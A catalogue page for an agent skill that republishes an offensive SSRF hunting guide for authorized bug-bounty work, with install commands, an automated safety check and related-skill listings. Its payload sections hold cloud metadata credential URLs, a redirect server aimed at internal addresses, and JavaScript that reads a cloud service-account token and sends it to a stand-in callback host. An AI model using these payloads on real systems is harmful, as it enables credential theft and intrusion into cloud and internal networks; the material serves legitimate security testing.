Agent skill

Hunt Ssrf

by sickn33 in sickn33/agentic-awesome-skills

“Hunting skill for ssrf vulnerabilities.”

— description from SKILL.md by sickn33
MITAuto-check: warningsSecurity

Install Hunt Ssrf

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-ssrf -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install sickn33/agentic-awesome-skills hunt-ssrf --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-ssrf .claude/skills/hunt-ssrf && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-ssrf
GitHub stars
47k
Used in
1 other repo
Token cost
~4.5k tokens
SKILL.md length
1,581 words
Files
2 (incl. references)
Skills in repo
1,497
Repo updated
First seen
Licence
MIT

At a glance

  • Works in 5 steps: Plant the Collaborator payload first.… → Send the request to the target endpoint. → Wait 30–120 seconds, then poll the OOB… → …
  • SKILL.md covers Crown Jewel Targets, OOB-Or-It-Didn't-Happen Gate…, Attack Surface Signals and Step-by-Step Hunting Methodology, plus 5 more sections
  • Calls curl; reaches canarytokens.org

About this skill

Hunt Ssrf is a skill in sickn33/agentic-awesome-skills (47k stars). Its SKILL.md is about 4.5k tokens, with 1 other file in the folder (references), and copies of it appear in 1 other owners' repositories. Licence: MIT.

Requirements

  • Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. Plant the Collaborator payload first. Sub-tagging (dlsrcurl.,
  2. Send the request to the target endpoint.
  3. Wait 30–120 seconds, then poll the OOB listener.
  4. Only after a confirmed callback do you claim SSRF.
  5. If zero callbacks across all sub-tagged sinks: SSRF claims must be retracted, even if error messages echo URLs.

What it can do on your machine

Read from SKILL.md and the folder at commit b84d35a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • canarytokens.org

    Also links to:

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

    From compatibility in the SKILL.md frontmatter.

Context cost

Hunt Ssrf loads about 4.5k tokens when it runs, and up to ~7.5k if it reads all its reference files. Until then it costs about 12 tokens; SKILL.md has 1,581 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~12
When it runs · the whole SKILL.md, loaded when a task matches
~4.5k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~7.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:250
    get.com/api/preview?url=https://YOUR_ID.oast.pro"
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:255
    -d '{"url":"https://YOUR_ID.oast.pro"}'

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from sickn33/agentic-awesome-skills at commit b84d35a, republished under its MIT licence (© sickn33). 1,581 words, ~4,454 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-ssrf/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.
name
hunt-ssrf
description
Hunting skill for ssrf vulnerabilities.
compatibility
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
category
security
risk
offensive
source
https://github.com/elementalsouls/Claude-BugHunter
source_repo
elementalsouls/Claude-BugHunter
source_type
community
date_added
2026-09-20
license
MIT
license_source
https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE
sources
github, hackerone_public, portswigger_research, binarysecurity_research
report_count
34

⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.

Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:

  1. Ask the user to state the exact target URL, IP, account, or resource.
  2. Ask the user to confirm written authorization and the permitted scope.
  3. Show the exact command(s) and explain their expected effect.
  4. Wait for explicit confirmation in the current conversation.

Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

Crown Jewel Targets

SSRF is highest-value when the target runs on cloud infrastructure (AWS, GCP, Azure) where metadata services expose credentials, or when the server sits inside a complex internal network (Kubernetes clusters, microservice meshes, internal APIs). Priority targets:

  • Cloud-hosted SaaS products (GCP metadata at 169.254.169.254 or metadata.google.internal, AWS IMDSv1)
  • Kubernetes/orchestration platforms — aggregated API servers, metrics-server, kubelet endpoints expose privileged cluster operations
  • Internal developer tooling — CI/CD, workflow orchestration (Flyte, Argo), admin panels not exposed externally
  • Link preview / URL fetching features — Reddit-style preview APIs, Slack-style unfurling, media processors
  • Dataset/file import pipelines — anything that fetches remote URLs on behalf of a user
  • Enterprise self-hosted software (GitHub Enterprise, GitLab) — SSRF frequently chains to RCE via internal services

Payouts are highest when SSRF reaches: cloud credentials → account takeover, internal admin APIs → data exfil, or chains to RCE.


OOB-Or-It-Didn't-Happen Gate (Read First)

Claims of blind SSRF require an out-of-band (OOB) confirmation. Always. No exceptions.

OOB means: a Burp Collaborator domain, an interactsh-client listener, a canarytoken, or any DNS+HTTP receiver you control that confirms the server actually made an outbound network connection on your behalf.

What is NOT confirmation of SSRF
  • The server echoing your URL back in an error message. Example: "The Web application at http://evil.example.com/x could not be found" — this is the server formatting your input into an error string, NOT making an outbound HTTP request. The error came from string formatting, not from network failure.
  • The server returning a different status code for an external URL vs localhost. Different error responses can come from URL-scheme validators, not from actual fetching.
  • A delayed response when the URL is sent. Delay can come from DNS resolution attempts within the parser, not from completed HTTP fetches.
What IS confirmation of SSRF
  • A DNS lookup for your unique Collaborator subdomain appears in the OOB listener.
  • An HTTP request to your Collaborator HTTP endpoint with the server's source IP and User-Agent.
  • For SSRF in JavaScript-execution contexts (PDF renderers, headless browsers), a fetch from the server to your callback URL.
Default workflow
  1. Plant the Collaborator payload first. Sub-tagging (dlsrcurl.<collab>, import.<collab>) only works if your listener actually reports the queried subdomain back to you — verify that before relying on it. Burp's get_collaborator_interactions keys results by payload ID, not by subdomain, so several sub-tags generated from one payload are indistinguishable in the output. When that is the case, generate a fresh payload per candidate parameter and send exactly one request per payload.
  2. Send the request to the target endpoint.
  3. Wait 30–120 seconds, then poll the OOB listener.
  4. Only after a confirmed callback do you claim SSRF.
  5. If zero callbacks across all sub-tagged sinks: SSRF claims must be retracted, even if error messages echo URLs.

Lesson from a authorized engagement: SharePoint's /_layouts/15/download.aspx?SourceUrl= returned 500 with the title "The Web application at <attacker-URL> could not be found". Initial scan flagged this as SSRF (server clearly processed the URL). 38 Collaborator-tagged payloads across 12+ URL-accepting parameters yielded zero DNS or HTTP interactions. The "echo" was client-side error-string formatting; the server never made an outbound HTTP request. The path is actually an SP-internal SPFile/SPWebApplication resolver, not a generic URL fetcher. Reporting this as SSRF would have been N/A'd at triage.

Attribute the callback to ONE parameter before reporting

A callback proves the server made a request. It does not tell you which parameter caused it, and the fix depends entirely on that.

BAD   — four candidate fields, one payload, fired in one batch
        -> callbacks arrive, attribution impossible, retest required

GOOD  — fresh payload per field, one request each, poll between
        url      -> callbacks    <- this is the sink
        apiUrl   -> none
        endpoint -> none
        target   -> none

Run the negative control. A parameter that produces no callback is evidence, and it belongs in the report — it is what lets the client fix the right field instead of allowlisting the wrong one.

Lesson from an authorized engagement. A server-side request-forwarding endpoint accepted both url and apiUrl. The application's own stored config used apiUrl, so that was the obvious suspect — but apiUrl was inert and url was the live sink. Batch-firing both had produced callbacks with no attribution; only per-payload isolation identified the real parameter. A report naming apiUrl would have sent the client to patch a field that does nothing.

Blind vs full-read — establish which before scoring

After a callback confirms the request leaves the server, check whether the upstream response body is returned to you. These are different findings:

  • Blind (callback only, no body): on the never-submit list standalone. Needs an internal service reached, or data returned, to be reportable.
  • Full-read (upstream body in the response): substantially higher severity — read arbitrary internal endpoints directly.
bash
# one request settles it: fetch something with a known, recognisable body
-d '{"url":"https://example.com/"}'
# {"statusCode":200,"data":"<!doctype html>...<title>Example Domain</title>..."}
#                          ^ body returned = full-read, not blind

Also body-diff a known-internal target against a known-external one. A distinct status on a link-local address (e.g. 401 from 169.254.169.254 where every other target returns 200) is the metadata service answering — that proves reach to a non-internet-routable address, which a status code alone otherwise cannot.


Attack Surface Signals

URL Patterns to Hunt
/api/*/preview
/api/*/fetch
/api/*/import
/api/*/webhook
/api/*/proxy
/api/*/render
/api/*/link
/api/*/screenshot
/api/*/export
/api/*/validate
?url=
?uri=
?endpoint=
?redirect=
?src=
?source=
?feed=
?host=
?target=
?dest=
?file=
?path=
?callback=
?image=
?load=
?fetch=
JS Patterns (in client-side code)
javascript
// Look for these in JS bundles
fetch(userInput)
axios.get(params.url)
XMLHttpRequest + variable URL
url: req.body.url
src: params.source
href: query.endpoint
Response Header Signals
X-Forwarded-For headers echoed back
Server: internal-service
Via: 1.1 internal-proxy
X-Cache headers revealing internal hostnames
Tech Stack Signals
  • Kubernetes — any public-facing aggregated API, metrics endpoints
  • GCP — any service fetching URLs that runs on Compute Engine/GKE
  • Node.js/Python with URL-fetching libraries (requests, node-fetch, axios)
  • Headless browsers (Puppeteer, PhantomJS) used for screenshots/PDF — extremely high value
  • XML/DSPL/CSV import features — XXE-style SSRF vector
  • OAuth/webhook registration endpoints

Show full SKILL.md (635 more words)Show less

Step-by-Step Hunting Methodology

  1. Map all URL-input parameters across the target: spider JS files for fetch calls, check all API docs, look for file-import, link-preview, webhook, image-proxy, and redirect features.

  2. Set up an out-of-band detection server using Burp Collaborator, interactsh, or https://canarytokens.org — you need a unique per-test DNS/HTTP callback domain.

  3. Send your callback URL as the parameter value first (blind SSRF check before anything else):

    url=https://YOUR.interactsh.com/test

    Confirm the server makes an outbound connection. This proves execution before attempting internal targets.

  4. Test internal cloud metadata endpoints:

    • GCP: http://metadata.google.internal/computeMetadata/v1/
    • AWS: http://169.254.169.254/latest/meta-data/
    • Azure: http://169.254.169.254/metadata/instance
  5. Test localhost and common internal ports:

    http://localhost/
    http://127.0.0.1:8080/
    http://127.0.0.1:6443/  (Kubernetes API)
    http://127.0.0.1:2379/  (etcd)
    http://127.0.0.1:9090/  (Prometheus)
    http://127.0.0.1:9200/  (Elasticsearch)
  6. Check for redirect-based SSRF — if the endpoint validates the initial URL but follows 30x redirects, host a redirect server pointing to internal addresses. Kubernetes report (Report 3) was specifically triggered by hijacked API servers returning 30x responses.

  7. Test JavaScript-execution contexts (headless browsers, PDF renderers):

    • Inject <script> tags that make XMLHttpRequest or fetch() calls to internal services
    • Exfil via DNS: encode response data in subdomain of your callback domain
  8. Enumerate the internal network using timing differences and error message variations:

    • Port scan via response time (connection refused vs timeout)
    • Check error messages for hostname/IP leakage
  9. Chain findings — if you have SSRF to internal services, look for:

    • Unauthenticated admin endpoints
    • Redis, memcached (protocol smuggling)
    • Internal OAuth token endpoints
    • SSRF → CSRF → RCE (GitHub Enterprise pattern)
  10. Document the full chain with screenshots of each hop before reporting.


Payload & Detection Patterns

Basic Out-of-Band Detection
bash
# Using interactsh-client
interactsh-client -v

# Test parameter
curl -s "https://target.com/api/preview?url=https://YOUR_ID.oast.pro"

# With common headers that might unlock SSRF
curl -s "https://target.com/api/fetch" \
  -H "Content-Type: application/json" \
  -d '{"url":"https://YOUR_ID.oast.pro"}'
Cloud Metadata Payloads
bash
# GCP - requires Metadata-Flavor header (test if server adds it automatically)
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/computeMetadata/v1/project/project-id
http://metadata/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/

# AWS IMDSv1 (no auth required)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
# AWS ECS task credentials (retrieve from env var AWS_CONTAINER_CREDENTIALS_RELATIVE_URI)
http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}

# Azure - instance metadata and managed identity token
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# Requires Metadata: true header for Azure requests

# Kubernetes service account credentials (file:// SSRF)
file:///var/run/secrets/kubernetes.io/serviceaccount/token
file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Localhost/Internal Port Payloads
bash
# Kubernetes internals
http://127.0.0.1:6443/api/v1/namespaces
http://10.0.0.1:6443/api/v1/secrets
http://127.0.0.1:10250/pods          # kubelet
http://127.0.0.1:2379/v2/keys        # etcd

# Common internal services
http://127.0.0.1:6379/               # Redis (check for inline commands)
http://127.0.0.1:9200/_cat/indices   # Elasticsearch
http://127.0.0.1:5601/               # Kibana
http://127.0.0.1:8500/v1/catalog/services  # Consul
Redirect-Based SSRF (when direct is blocked)
python
# Simple Python redirect server
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(301)
        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/')
        self.end_headers()

HTTPServer(('0.0.0.0', 8080), Redirect).serve_forever()
JavaScript-Based SSRF (headless browser contexts)
javascript
// Exfil via fetch
fetch('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', {
  headers: {'Metadata-Flavor': 'Google'}
}).then(r=>r.text()).then(d=>{
  fetch('https://YOUR.callback.com/?d='+btoa(d))
})

// DNS exfil for blind contexts
var x = new XMLHttpRequest();
x.open('GET','http://169.254.169.254/latest/meta-data/');
x.send();
x.onload = function(){
  var img = new Image();
  img.src = 'https://'+btoa(x.responseText.substring(0,50))+'.YOUR.callback.com';
}
Grep Patterns for Source Code Review
bash
# Find URL fetch operations
grep -rE "(fetch|curl|urllib|requests\.get|http\.get|axios\.get)\s*\(" --include="*.py" --include="*.js" --include="*.go"

# Find URL parameters being passed to HTTP clients
grep -rE "(url|uri|endpoint|redirect|src|source)\s*=\s*req\.(query|body|params)" --include="*.js"

# Find redirect following
grep -rE "(follow_redirects|allow_redirects|followRedirects)\s*=\s*[Tt]rue"
ffuf Parameter Discovery
bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -u "https://target.com/api/endpoint?FUZZ=https://YOUR.callback.com" \
  -fs 0 -mc all

Common Root Causes

  1. "The user said it was safe" — Developers trust user-supplied URLs for fetching remote resources (link previews, thumbnails, webhooks) without validating the destination. The feature is legitimate; the missing validation is the bug.

  2. Allowlist bypass via redirects — Developers validate the initial URL against an allowlist but configure HTTP clients to follow redirects automatically. An attacker's server on the allowlist redirects to an internal address.

  3. Aggregated/proxy API trust — Kubernetes-style architectures where an API aggregation layer blindly proxies 30x responses from registered extension servers. Compromising a single extension server gives SSRF into the core API.

  4. Server-side rendering without sandboxing — Headless browser features (PDF generation, link preview screenshots) execute attacker-controlled JavaScript in a network-privileged context with access to metadata services.

  5. XML/DSPL/file parsers fetching external entities — Import features that parse structured files (XML, DSPL, CSV with remote schemas) fetch attacker-controlled URLs, often with no URL validation at all.

  6. Internal hostname leakage via response differences — Services return different error messages, timing, or response sizes for internal vs. external hosts, enabling blind enumeration even when content isn't returned.

  7. IMDSv1 still enabled — Cloud deployments that haven't migrated to IMDSv2 (AWS) or haven't required the Metadata-Flavor header (GCP) allow unauthenticated credential access from any SSRF.


Contents

When to Use

  • You have explicit, written authorization to assess the target in scope, and the task matches this skill's vulnerability class or technique within a bug-bounty or penetration-test engagement.
  • You need the recon, exploitation, or validation workflow described below — executed strictly inside the approved scope.

Limitations

  • Authorized scope only: the confirmation gate above is mandatory before any probing, exploitation, or credential-access command.
  • Docs-only import: upstream helper scripts, commands, engine, and research assets are not bundled; reinstall tooling from the source repo when needed.
  • Validate every finding (see triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.
Example
bash
# Read-only first step; confirm scope before anything active.
cat scope.txt  # target list from the authorized engagement brief

Adapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.

© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 1 other file (references) in skills/hunt-ssrf of sickn33/agentic-awesome-skills.

  • SKILL.md
  • references/details.md

Open the folder on GitHubat commit b84d35a

Used in 1 other repository

We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Hunt Ssrf next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Ssrf compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Ssrf this skillsickn33/agentic-awesome-skills47k1 repos~4.5kAutomated safety check: WarnMIT
Security And Hardeningpenpot/penpot61k6 repos~4.7kAutomated safety check: NotesMPL-2.0
Security Auditoreigent-ai/eigent15k—~1.8kAutomated safety check: NotesApache-2.0
Security Reviewjewbetcha/opentrace11618 repos~3.1kAutomated safety check: NotesMIT
Strix Code Vulnerability Scanusestrix/strix68k—~1.1kAutomated safety check: PassApache-2.0
Code Audit3stoneBrother/code-audit8921 repos~2.7kAutomated safety check: PassNone

Similar skills

  • Hardens code against vulnerabilities. An agent skill from penpot/penpot.

    61k GitHub starsUsed in 6 repos~4.7k tokens
    SecurityAuto-check: notes
  • Security Auditor

    eigent-ai/eigent

    Audits source code, dependencies and config files for vulnerabilities and hardcoded secrets, using two bundled Python scanners and an OWASP Top 10 checklist.

    15k GitHub stars~1.8k tokensUpdated yesterday
    SecurityAuto-check: notes
  • Security Review

    jewbetcha/opentrace

    A skill your agent uses when adding authentication, handling user input, working with secrets, creating API endpoints, or implementing payment/sensitive features.

    116 GitHub starsUsed in 18 repos~3.1k tokens
    SecurityAuto-check: notes
  • Runs a Strix white-box security review that reads the source, then exploits what it finds in a sandbox so each reported issue has a proof-of-concept.

    68k GitHub stars~1.1k tokensUpdated today
    SecurityAuto-check passed
  • Code Audit

    3stoneBrother/code-audit

    Professional code security audit skill covering 55+ vulnerability types.

    892 GitHub starsUsed in 1 repo~2.7k tokens
    SecurityAuto-check passed
  • Triages findings from a Strix pentest by severity, fixes each root cause with a minimal change, and re-runs Strix to confirm the exploit no longer works.

    68k GitHub stars~1.5k tokensUpdated today
    SecurityAuto-check passed

More from sickn33/agentic-awesome-skills

All 1,497 skills in this repo
  • Liuguang Banlan UI

    sickn33/agentic-awesome-skills

    Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • User Thoughts Memory

    sickn33/agentic-awesome-skills

    Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • Using LWC Memory and Graphs

    sickn33/agentic-awesome-skills

    Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.

    47k GitHub starsUsed in 1 repo~2k tokens
    Auto-check passed
  • Find Complementary Founders

    sickn33/agentic-awesome-skills

    Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.

    47k GitHub starsUsed in 1 repo~4.8k tokens
    Auto-check passed
  • Whatsapp Cloud API

    sickn33/agentic-awesome-skills

    Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~4.5k tokens
    Auto-check passed
  • Cline Pilot

    sickn33/agentic-awesome-skills

    Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.

    47k GitHub starsUsed in 1 repo~4.6k tokens
    Auto-check passed

Categories

Questions about Hunt Ssrf

How do I install Hunt Ssrf in Claude Code?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-ssrf -a claude-code`. Or copy the skill folder (skills/hunt-ssrf in sickn33/agentic-awesome-skills) into .claude/skills/hunt-ssrf in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Ssrf in Codex?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-ssrf -a codex`. Or copy the skill folder (skills/hunt-ssrf in sickn33/agentic-awesome-skills) into .agents/skills/hunt-ssrf in your project. Codex loads it when a task matches its description.

Can I use Hunt Ssrf in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-ssrf -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-ssrf, .gemini/skills/hunt-ssrf, .github/skills/hunt-ssrf and .opencode/skills/hunt-ssrf in your project.

What does Hunt Ssrf need to run?

Going by SKILL.md and its folder, Hunt Ssrf needs the command-line tools its instructions call (curl). Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..

Does Hunt Ssrf access the network?

SKILL.md names 2 domains. In commands or code: canarytokens.org; the agent is likely to contact it when it follows the instructions. As links in the text: github.com. This is read from the text; nothing was executed.

Is Hunt Ssrf safe to install?

Our automated static check of SKILL.md flagged 2 warning(s): mentions a paste, webhook or tunnelling service often used to send data out. Read the flagged lines before installing; the check is not a guarantee either way.

What licence does Hunt Ssrf use?

Hunt Ssrf is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Ssrf use?

About 4.5k tokens (SKILL.md is roughly 18k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 3k tokens, read only when the agent opens those files.

What are the alternatives to Hunt Ssrf?

Skills that share tags, products or a category with Hunt Ssrf: Security And Hardening (penpot/penpot, 61k stars), Security Auditor (eigent-ai/eigent, 15k stars), Security Review (jewbetcha/opentrace, 116 stars) and Strix Code Vulnerability Scan (usestrix/strix, 68k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Ssrf?

sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,405 GitHub stars. The repository holds 1,497 skills in this directory. The repository was last updated on October 9, 2026.

Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.